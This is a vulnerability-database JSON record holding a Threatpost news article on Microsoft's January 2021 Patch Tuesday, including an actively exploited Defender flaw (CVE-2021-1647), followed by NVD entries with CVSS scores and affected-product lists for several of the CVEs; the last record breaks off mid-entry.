{"id": "THREATPOST:B879E243998561911585BBD37B7F33E9", "type": "threatpost", "bulletinFamily": "info", "title": "Critical Microsoft Defender Bug Actively Exploited; Patch Tuesday Offers 83 Fixes", "description": "Microsoft addressed 10 critical bugs, one under active exploit and another publicly known, in its [January Patch Tuesday roundup of fixes](<https://msrc.microsoft.com/update-guide>). In total it patched 83 vulnerabilities.\n\nThe most serious bug is a flaw in Microsoft\u2019s Defender anti-malware software that allows remote attackers to infect targeted systems with executable code. Security experts are warning that Windows users who have not connected to internet recently and received an auto-update, should patch now.\n\n\u201cThis bug in the Microsoft Malware Protection Engine may already be patched on your system as the engine auto-updates as needed. However, if your systems are not connected to the internet, you\u2019ll need to manually apply the patch,\u201d wrote Dustin Childs, Trend Micro\u2019s Zero Day Initiative (ZDI) security manager. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers believe the vulnerability, [tracked as CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>), has been exploited for the past three months and was leveraged by hackers as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>). Last month, Microsoft said state-sponsored hackers had compromised its internal network and leveraged additional Microsoft products to conduct further attacks.\n\nAffected versions of Microsoft Malware Protection Engine range from 1.1.17600.5 to 1.1.17700.4 running on Windows 10, Windows 7 and 2004 Windows Server, [according t](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)o the security bulletin.\n\n## **Publicly Known Bug Fixed Twice **\n\nMicrosoft patched a second vulnerability, that researchers believe was also being exploited in the wild, tracked as [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>). The flaw is classified as an elevation-of-privilege bug and impacts the Windows [print driver process SPLWOW64.exe](<https://goliathtechnologies.com/troubleshoot-resolve-citrix-splwow64-exe-issues-p>).\n\nThe bug first discovered by Google and patched. But ZDI believes that patch was insufficient and opened the door to further attacks. Childs said that ZDI re-discovered the flaw a second time, which Microsoft is patched again Tuesday.\n\n\u201cThe previous patch introduced a function to check an input string pointer, but in doing so, it introduced an Out-of-Bounds (OOB) Read condition. Additional bugs are also covered by this patch, including an untrusted pointer deref,\u201d Childs wrote in a prepared [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/1/12/the-january-2021-security-update-review>).\n\n## **Additional Critical Bugs **\n\nEight additional bugs rated critical were also part of Microsoft\u2019s Tuesday vulnerability fixes.\n\nThese included a remote code-execution bug in Microsoft\u2019s Edge web browser. The vulnerability (CVE-2021-1705) is memory-related and tied to a the way the browser improperly access objects in memory.\n\n\u201cSuccessful exploitation of the vulnerability could enable an attacker to gain the same privileges as the current user,\u201d wrote Justin Knapp, senior product marketing manager with Automox, in prepared analysis. \u201cIf the current user is logged on with admin rights, an attacker could take control of an affected system. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights. An attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website.\u201d\n\nAdditional critical bugs were tied to Windows Graphics Device Interface (CVE-2021-1665), HEVC Video Extensions (CVE-2020-1643), and the Microsoft DTV-DVD Video Decoder (CVE-2020-1668).\n\nFive January Patch Tuesday flaws (CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667 and CVE-2021-1673) were each remote procedure call bugs. As the name suggests, the vulnerability exists in Windows Remote Procedure Call authentication process. If exploited, an attacker could gain elevation of privileges, run a specially crafted application and take complete control of the targeted system.\n\n\u201cWith the SolarWinds breach still fresh from December and the scope of impact growing by the day, there\u2019s a reaffirmed urgency for organizations to implement best practices for even the most basic security habits,\u201d Knapp wrote. \u201cWhether it\u2019s patching zero-day vulnerabilities within a 24-hour window or implementing strong password protocols, the need for security diligence has never been more evident.\u201d\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m. ET._\n", "published": "2021-01-12T21:45:23", "modified": "2021-01-12T21:45:23", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/", "reporter": "Tom Spring", "references": ["https://msrc.microsoft.com/update-guide", "https://threatpost.com/newsletter-sign/", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647", "https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648", "https://goliathtechnologies.com/troubleshoot-resolve-citrix-splwow64-exe-issues-p", "https://www.zerodayinitiative.com/blog/2021/1/12/the-january-2021-security-update-review", "https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar", "https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar", "https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar"], "cvelist": ["CVE-2020-1643", "CVE-2020-1668", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1673", "CVE-2021-1705"], "lastseen": "2021-01-13T05:41:44", "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-1665", "CVE-2021-1673", "CVE-2021-1705", "CVE-2021-1647", "CVE-2021-1660", "CVE-2020-1668", "CVE-2021-1667", "CVE-2021-1666", "CVE-2021-1648", "CVE-2021-1658"]}, {"type": "thn", "idList": ["THN:970890B8E519A3BC5427798160F5F09C", "THN:9CF96D7230D0DBA395C1DEDA718226AD"]}, {"type": "attackerkb", "idList": ["AKB:06000FAE-591B-46C7-8573-3D63BDDD0D13", "AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04"]}, {"type": "krebs", "idList": ["KREBS:B3F20C0C41C613971FDADBAE93382CDF"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_JAN_4598287.NASL", "SMB_NT_MS21_JAN_4598243.NASL", "SMB_NT_MS21_JAN_4598230.NASL", "SMB_NT_MS21_JAN_4598278.NASL", "SMB_NT_MS21_JAN_4598279.NASL", "SMB_NT_MS21_JAN_4598245.NASL", "SMB_NT_MS21_JAN_WIN_DEFENDER.NASL", "SMB_NT_MS21_JAN_FEP.NASL", "SMB_NT_MS21_JAN_4598275.NASL", "JUNIPER_JSA11030.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1"]}, {"type": "threatpost", "idList": ["THREATPOST:CC6B78233FCEA8EE95CECB4A3672985C", "THREATPOST:FF67AF009F2F0031599099334F6CC306"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C38FDAA2A9E5E349305313C6D17A0D3A"]}, {"type": "cisa", "idList": ["CISA:F7C7CFE30EB8A6B7C1DCDEA50F649F74"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1648", "MS:CVE-2021-1665", "MS:CVE-2021-1666", "MS:CVE-2021-1705", "MS:CVE-2021-1660", "MS:CVE-2021-1658", "MS:CVE-2021-1647", "MS:CVE-2021-1673", "MS:CVE-2021-1667"]}, {"type": "zdi", "idList": ["ZDI-21-078", "ZDI-21-024", "ZDI-21-020", "ZDI-21-022"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}], "modified": "2021-01-13T05:41:44", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-13T05:41:44", "rev": 2}, "vulnersScore": 6.8}}

{"cve": [{"lastseen": "2021-02-02T07:55:04", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1658", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1658"], "modified": "2021-01-20T14:09:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2021-1658", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1658", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1666", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1666"], "modified": "2021-01-19T19:41:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2021-1666", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1666", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Microsoft Defender Remote Code Execution Vulnerability", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1647", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1647"], "modified": "2021-01-14T19:28:00", "cpe": ["cpe:/a:microsoft:security_essentials:-", "cpe:/a:microsoft:system_center_endpoint_protection:-", "cpe:/a:microsoft:system_center_endpoint_protection:2012", "cpe:/a:microsoft:windows_defender:-"], "id": "CVE-2021-1647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1647", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:system_center_endpoint_protection:2012:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:security_essentials:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:system_center_endpoint_protection:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:windows_defender:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:system_center_endpoint_protection:2012:r2:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "GDI+ Remote Code Execution Vulnerability", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1665", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1665"], "modified": "2021-01-20T19:18:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2021-1665", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1665", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1660", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1660"], "modified": "2021-01-20T13:59:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2021-1660", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1660", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1673", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1673"], "modified": "2021-01-20T19:11:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2021-1673", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1673", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": 